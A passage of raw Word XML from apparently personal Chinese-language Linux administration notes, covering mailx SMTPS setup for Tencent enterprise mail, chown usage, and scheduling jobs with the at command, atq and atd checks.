        <w:t>linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仓库，原因如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB6314F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同样配置访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>smtp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>465</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传输。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mailx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置好一切内容后，还是很容易被拦截当作垃圾邮件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518EA433" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与上面操作相同的配置、相同的服务器下，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序在设置好一切后，可以轻松发送相关内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683E2625" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="334A4FAE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44DF91D0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FE9BCF7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成客户端密码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550338DB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>https://work.weixin.qq.com/help?person_id=0&amp;doc_id=301&amp;helpType=exmail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A8FD53" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="290B5C34" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:t>下利用</w:t>
      </w:r>
      <w:r>
        <w:t>mailx</w:t>
      </w:r>
      <w:r>
        <w:t>配置腾讯企业邮箱</w:t>
      </w:r>
      <w:r>
        <w:t>smtps 465</w:t>
      </w:r>
      <w:r>
        <w:t>端口发送邮件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DD04E4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>https://blog.espnlol.com/?p=335</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41117C0A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56D063F9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Linux </w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>mailx</w:t>
      </w:r>
      <w:r>
        <w:t>发送邮件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13982738" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>https://zhuanlan.zhihu.com/p/596267626</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F254810" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">centos7 </w:t>
      </w:r>
      <w:r>
        <w:t>利用</w:t>
      </w:r>
      <w:r>
        <w:t>mailx</w:t>
      </w:r>
      <w:r>
        <w:t>发送邮件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644A7AE8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>https://cloud.tencent.com/developer/article/1416520</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185A021B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="500F87E5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="261" w:name="_Toc159779721"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限操作</w:t>
      </w:r>
      <w:bookmarkEnd w:id="261"/>
    </w:p>
    <w:p w14:paraId="7EDD3DF8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>chown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089F54E0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>-R</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:r>
        <w:t>递归操作文件和目录递归</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6387B990" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>chown -R ftpuser:ftpuser ${rootPath}/*.sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E6BF3F" w14:textId="51C4F15D" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B6C701A" w14:textId="3F7505F9" w:rsidR="000F72A7" w:rsidRDefault="000F72A7" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="262" w:name="_Toc159779722"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定时任务</w:t>
      </w:r>
      <w:bookmarkEnd w:id="262"/>
    </w:p>
    <w:p w14:paraId="00BD5354" w14:textId="0CCCEB28" w:rsidR="000F72A7" w:rsidRDefault="000F72A7" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>at</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6619A0" w14:textId="412402BE" w:rsidR="000F72A7" w:rsidRDefault="000F72A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D8A10D6" w14:textId="67C87DF4" w:rsidR="00A50B0A" w:rsidRPr="009F001E" w:rsidRDefault="00A50B0A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F001E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="009F001E">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>trl+D</w:t>
      </w:r>
      <w:r w:rsidRPr="009F001E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>退出布置任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312EBB9A" w14:textId="77777777" w:rsidR="00A50B0A" w:rsidRDefault="00A50B0A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50A5F2DF" w14:textId="0D7D5E02" w:rsidR="000F72A7" w:rsidRDefault="00964A52" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00964A52">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId81" w:history="1">
        <w:r w:rsidR="00545105" w:rsidRPr="00C32DBD">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://bbs.huaweicloud.com/blogs/297334</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="614CAF9E" w14:textId="7B5422DA" w:rsidR="00545105" w:rsidRDefault="00545105" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C7AF6C1" w14:textId="77777777" w:rsidR="00545105" w:rsidRDefault="00545105" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指定时间的方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24591A4A" w14:textId="77777777" w:rsidR="00545105" w:rsidRDefault="00545105" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接受在当天的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00663266">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>hh:mm</w:t>
      </w:r>
      <w:r w:rsidRPr="00663266">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>（小时</w:t>
      </w:r>
      <w:r w:rsidRPr="00663266">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00663266">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>分钟）式的时间指定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。假如</w:t>
      </w:r>
      <w:r w:rsidRPr="00663266">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>该时间已过去，那么就放在第二天执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>04:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09524A00" w14:textId="77777777" w:rsidR="00545105" w:rsidRDefault="00545105" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> midnight</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（深夜），</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>noon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（中午），</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>teatime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（饮茶时间，一般是下午</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点）等比较模糊的词语来指定时间。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34ED8F8F" w14:textId="77777777" w:rsidR="00545105" w:rsidRDefault="00545105" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>采用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 12 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>小时计时制，即在时间后面加上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> AM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（上午）或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> PM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（下午）来说明是上午还是下午。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>12pm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A92536" w14:textId="77777777" w:rsidR="00545105" w:rsidRDefault="00545105" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指定命令执行的具体日期，指定格式为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> month day</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日）或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> mm/dd/yy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年）或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> dd.mm.yy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（日</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年），指定的</w:t>
      </w:r>
      <w:r w:rsidRPr="00663266">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>日期必须跟在指定时间的后面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>04:00 2021-05-12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C054E4D" w14:textId="77777777" w:rsidR="00545105" w:rsidRDefault="00545105" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用相对计时法。指定格式为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">now + count time-units </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">now </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就是当前时间，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">time-units </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是时间单位，这里能够是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> minutes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（分钟）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hours</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（小时）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>days</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（天）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>weeks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（星期）。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">count </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是时间的数量，几天，几小时。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>now + 5 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C9F6EF" w14:textId="6299B6F6" w:rsidR="00545105" w:rsidRDefault="00545105" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> today</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（今天）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tomorrow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（明天）来指定完成命令的时间。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D02466A" w14:textId="77777777" w:rsidR="00545105" w:rsidRDefault="00545105" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="270F4EA1" w14:textId="77777777" w:rsidR="00545105" w:rsidRPr="00545105" w:rsidRDefault="00545105" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C00BEC4" w14:textId="1FE674D1" w:rsidR="000F72A7" w:rsidRDefault="003A666C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003A666C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ps -ef | grep atd //</w:t>
      </w:r>
      <w:r w:rsidRPr="003A666C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以检测</w:t>
      </w:r>
      <w:r w:rsidRPr="003A666C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> atd </w:t>
      </w:r>
      <w:r w:rsidRPr="003A666C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否在运行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC9BB75" w14:textId="0E59712A" w:rsidR="00964A52" w:rsidRDefault="00964A52" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B008072" w14:textId="77777777" w:rsidR="001051F0" w:rsidRDefault="001051F0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询有无没有执行的工作任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18571B52" w14:textId="4E8D7BFA" w:rsidR="001051F0" w:rsidRDefault="001051F0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>tq</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C08A9D" w14:textId="7501E9F3" w:rsidR="007521F2" w:rsidRDefault="007521F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="657906B6" w14:textId="617814AB" w:rsidR="000E1D9E" w:rsidRDefault="000E1D9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看某个具体的任务，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>t -c N(</w:t>
      </w:r>
      <w:r w:rsidRPr="000E1D9E">
        <w:rPr>
